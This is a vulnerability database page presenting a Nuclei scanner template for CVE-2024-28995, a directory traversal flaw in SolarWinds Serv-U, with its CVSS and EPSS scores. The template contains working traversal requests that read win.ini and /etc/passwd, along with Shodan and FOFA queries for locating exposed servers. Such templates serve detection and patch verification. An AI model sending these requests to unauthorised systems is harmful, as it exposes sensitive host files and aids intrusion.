Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2024-28995
HistoryJun 13, 2024 - 10:02 a.m.

SolarWinds Serv-U - Directory Traversal

2024-06-1310:02:51
ProjectDiscovery
github.com
26
solarwinds
serv-u
directory traversal
vulnerability
sensitive files

8.6 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

6.4 Medium

AI Score

Confidence

Low

0.343 Low

EPSS

Percentile

97.1%

SolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensitive files on the host machine.
id: CVE-2024-28995

info:
  name: SolarWinds Serv-U - Directory Traversal
  author: DhiyaneshDK
  severity: high
  description: |
    SolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensitive files on the host machine.
  reference:
    - https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
    - https://nvd.nist.gov/vuln/detail/CVE-2024-28995
    - https://x.com/stephenfewer/status/1801191416741130575
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-28995
    cwe-id: CWE-22
    cpe: cpe:2.3:a:solarwinds:serv-u:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: solarwinds
    product: serv-u
    shodan-query: html:"Serv-U"
    fofa-query: server="Serv-U"
  tags: cve,cve2024,lfi,solarwinds,serv-u

http:
  - raw:
      - |
        GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /?InternalDir=\..\..\..\..\etc&InternalFile=passwd HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
        condition: or

      - type: dsl
        dsl:
          - 'contains(header, "Serv-U")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100f7464125ccd5146080c76c675872c18c8bd0eb548bb8b1ba0cb9a979e4a8db9b02204c5cfd2b1ac281a288ed84c4fe0fe06376db38e710553793adf0216811a0a537:922c64590222798bb761d5b6d8e72950

8.6 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

6.4 Medium

AI Score

Confidence

Low

0.343 Low

EPSS

Percentile

97.1%